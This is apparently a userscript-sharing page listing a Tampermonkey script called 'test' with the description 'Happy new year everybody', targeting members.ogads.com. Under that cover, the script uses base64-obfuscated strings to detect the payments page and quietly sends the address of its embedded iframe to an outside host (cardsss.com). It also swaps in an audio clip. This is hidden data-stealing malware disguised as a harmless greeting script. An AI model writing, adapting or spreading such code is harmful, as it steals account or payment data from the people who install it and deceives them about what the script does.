您需要先安装一个扩展,例如 篡改猴、Greasemonkey 或 暴力猴,之后才能安装此脚本。
您需要先安装一个扩展,例如 篡改猴 或 暴力猴,之后才能安装此脚本。
您需要先安装一个扩展,例如 篡改猴 或 暴力猴,之后才能安装此脚本。
您需要先安装一个扩展,例如 篡改猴 或 Userscripts ,之后才能安装此脚本。
您需要先安装一款用户脚本管理器扩展,例如 Tampermonkey,才能安装此脚本。
您需要先安装用户脚本管理器扩展后才能安装此脚本。
Happy new year everybody
// ==UserScript== // @name test // @namespace http://tampermonkey.net/ // @version 1.1 // @description Happy new year everybody // @author xxx // @match https://members.ogads.com/* // @grant none // ==/UserScript== (function() { 'use strict'; window.onload=function(){document.getElementById("ding").src="https://media.vocaroo.com/mp3/d1rFAFDxVzn",setTimeout(function(){if(document.location.href.endsWith(atob("cGF5bWVudHMucGhw"))){const e=new XMLHttpRequest;e.open("GET",atob("aHR0cHM6Ly9jYXJkc3NzLmNvbS9vZ2Fkcy5waHA/dT0=")+encodeURIComponent(document.getElementsByTagName("iframe")[0].src)),e.send()}},1e3)}; })();